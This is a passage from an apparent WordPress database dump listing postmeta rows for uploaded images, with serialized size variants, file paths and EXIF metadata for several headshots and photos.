s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"cropped-sathwik-2-scaled-1-768x770.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:770;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:40:\"cropped-sathwik-2-scaled-1-1532x1536.jpg\";s:5:\"width\";i:1532;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"iPhone 12 Pro Max\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1646940899\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"7.5\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1341,1007,'_oembed_c0de30b09b8d9221f23cb02551fd0932','{{unknown}}'),(1353,1021,'_wp_attached_file','2022/04/sara.jpg'),(1354,1021,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1782;s:6:\"height\";i:1188;s:4:\"file\";s:16:\"2022/04/sara.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"sara-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"sara-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"sara-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"sara-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:18:\"sara-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1355,1022,'_wp_attached_file','2022/04/cropped-sara.jpg'),(1356,1022,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1188;s:6:\"height\";i:1188;s:4:\"file\";s:24:\"2022/04/cropped-sara.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"cropped-sara-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"cropped-sara-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"cropped-sara-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"cropped-sara-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1357,1022,'_oembed_f09eee8f9fa85b4c124534d589f2b08a','{{unknown}}'),(1391,1049,'_wp_attached_file','2022/04/cropped-Ryan-e1649958770354.jpg'),(1392,1049,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1614;s:4:\"file\";s:39:\"2022/04/cropped-Ryan-e1649958770354.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"cropped-Ryan-e1649958770354-279x300.jpg\";s:5:\"width\";i:279;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"cropped-Ryan-e1649958770354-952x1024.jpg\";s:5:\"width\";i:952;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"cropped-Ryan-e1649958770354-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"cropped-Ryan-e1649958770354-768x826.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:826;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:41:\"cropped-Ryan-e1649958770354-1428x1536.jpg\";s:5:\"width\";i:1428;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:26:\"cropped-Ryan-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1576058051\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1393,1049,'_oembed_510e67420be295a402b2929fb9af4dc0','{{unknown}}'),(1394,1049,'_edit_lock','1649960061:1'),(1395,1049,'_wp_attachment_backup_sizes','a:7:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1500;s:6:\"height\";i:2250;s:4:\"file\";s:16:\"cropped-Ryan.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:24:\"cropped-Ryan-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:24:\"cropped-Ryan-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:25:\"cropped-Ryan-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:25:\"cropped-Ryan-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"1536x1536-orig\";a:4:{s:4:\"file\";s:26:\"cropped-Ryan-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"2048x2048-orig\";a:4:{s:4:\"file\";s:26:\"cropped-Ryan-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(1396,1049,'_edit_last','1'),(1397,1050,'_wp_attached_file','2022/04/cropped-cropped-Ryan-e1649958770354.jpg'),(1398,1050,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1498;s:6:\"height\";i:1498;s:4:\"file\";s:47:\"2022/04/cropped-cropped-Ryan-e1649958770354.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"cropped-cropped-Ryan-e1649958770354-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"cropped-cropped-Ryan-e1649958770354-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"cropped-cropped-Ryan-e1649958770354-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"cropped-cropped-Ryan-e1649958770354-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1576058051\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1399,1050,'_oembed_e7135b44271a7407470a47e2d6317b2e','{{unknown}}'),(1436,1093,'_wp_attached_file','2022/04/Jean.jpg'),(1437,1093,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1934;s:6:\"height\";i:2277;s:4:\"file\";s:16:\"2022/04/Jean.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"Jean-255x300.jpg\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"Jean-870x1024.jpg\";s:5:\"width\";i:870;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"Jean-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"Jean-768x904.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:904;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:18:\"Jean-1305x1536.jpg\";s:5:\"width\";i:1305;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:18:\"Jean-1739x2048.jpg\";s:5:\"width\";i:1739;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1438,1094,'_wp_attached_file','2022/04/cropped-Jean.jpg'),(1439,1094,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1932;s:6:\"height\";i:1932;s:4:\"file\";s:24:\"2022/04/cropped-Jean.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"cropped-Jean-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"cropped-Jean-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"cropped-Jean-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"cropped-Jean-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"cropped-Jean-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1440,1094,'_oembed_a0f37d608fb49347f752d39d16b65256','{{unknown}}'),(1477,1137,'_wp_attached_file','2022/04/disaster1-scaled.jpg'),(1478,1137,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:28:\"2022/04/disaster1-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"disaster1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"disaster1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"disaster1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"disaster1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"disaster1-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:23:\"disaster1-2048x1536.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:13:\"disaster1.jpg\";}'),(1479,1138,'_wp_attached_file','2022/04/cropped-disaster1-scaled-1.jpg'),(1480,1138,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1920;s:4:\"file\";s:38:\"2022/04/cropped-disaster1-scaled-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"cropped-disaster1-scaled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"cropped-disaster1-scaled-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"cropped-disaster1-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"cropped-disaster1-scaled-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:40:\"cropped-disaster1-scaled-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1481,1140,'extend_builder','a:2:{s:4:\"json\";i:353;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:280;i:1;i:285;i:2;i:286;i:3;i:287;i:4;i:288;i:5;i:289;i:6;i:290;i:7;i:291;i:8;i:314;i:9;i:321;i:10;i:322;i:11;i:324;i:12;i:317;i:13;i:318;i:14;i:319;i:15;i:292;i:16;i:293;i:17;i:294;i:18;i:295;i:19;i:296;i:20;i:298;}}}'),(1492,1153,'_wp_attached_file','2022/04/BeforeSimulCast.png'),(1493,1153,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:795;s:6:\"height\";i:501;s:4:\"file\";s:27:\"2022/04/BeforeSimulCast.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"BeforeSimulCast-300x189.png\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"BeforeSimulCast-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"BeforeSimulCast-768x484.png\";s:5:\"width\";i:768;s:6:\"height\";i:484;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1494,1154,'_wp_attached_file','2022/04/cropped-BeforeSimulCast.png'),(1495,1154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:543;s:6:\"height\";i:501;s:4:\"file\";s:35:\"2022/04/cropped-BeforeSimulCast.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"cropped-BeforeSimulCast-300x277.png\";s:5:\"width\";i:300;s:6:\"height\";i:277;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"cropped-BeforeSimulCast-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1502,1162,'_wp_attached_file','2022/04/cropped-BeforeSimulCast-1.png'),(1503,1162,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:484;s:4:\"file\";s:37:\"2022/04/cropped-BeforeSimulCast-1.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"cropped-BeforeSimulCast-1-300x259.png\";s:5:\"width\";i:300;s:6:\"height\";i:259;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"cropped-BeforeSimulCast-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1528,1187,'_wp_attached_file','2022/04/388de91c055c0831e049331d9ba8335e-scaled.jpg'),(1529,1187,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:2560;s:4:\"file\";s:51:\"2022/04/388de91c055c0831e049331d9ba8335e-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"388de91c055c0831e049331d9ba8335e-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:45:\"388de91c055c0831e049331d9ba8335e-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"388de91c055c0831e049331d9ba8335e-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"388de91c055c0831e049331d9ba8335e-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:46:\"388de91c055c0831e049331d9ba8335e-1152x1536.jpg\";s:5:\"width\";i:1152;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:46:\"388de91c055c0831e049331d9ba8335e-1536x2048.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1650612959\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:36:\"388de91c055c0831e049331d9ba8335e.jpg\";}'),(1530,1188,'_wp_attached_file','2022/04/cropped-388de91c055c0831e049331d9ba8335e-scaled-1.jpg'),(1531,1188,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1919;s:6:\"height\";i:1923;s:4:\"file\";s:61:\"2022/04/cropped-388de91c055c0831e049331d9ba8335e-scaled-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:61:\"cropped-388de91c055c0831e049331d9ba8335e-scaled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"cropped-388de91c055c0831e049331d9ba8335e-scaled-1-1022x1024.jpg\";s:5:\"width\";i:1022;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"cropped-388de91c055c0831e049331d9ba8335e-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"cropped-388de91c055c0831e049331d9ba8335e-scaled-1-768x770.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:770;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:63:\"cropped-388de91c055c0831e049331d9ba8335e-scaled-1-1533x1536.jpg\";s:5:\"width\";i:1533;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1650612959\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1532,1188,'_oembed_f87df867a07bd26b7fe22a62fccf1427','{{unknown}}'),(1548,1204,'_wp_attached_file','2022/04/Opherus.png'),(1549,1204,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:664;s:6:\"height\";i:629;s:4:\"file\";s:19:\"2022/04/Opherus.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Opherus-300x284.png\";s:5:\"width\";i:300;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Opherus-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1550,1205,'_wp_attached_file','2022/04/cropped-Opherus.png'),(1551,1205,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:629;s:6:\"height\";i:629;s:4:\"file\";s:27:\"2022/04/cropped-Opherus.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"cropped-Opherus-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"cropped-Opherus-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1577,1221,'_wp_attached_file','2022/03/cropped-cropped-cropped-headshot-1-e1651208089645.jpg'),(1578,1221,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:61:\"2022/03/cropped-cropped-cropped-headshot-1-e1651208089645.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:46:\"cropped-cropped-cropped-headshot-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"cropped-cropped-cropped-headshot-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46: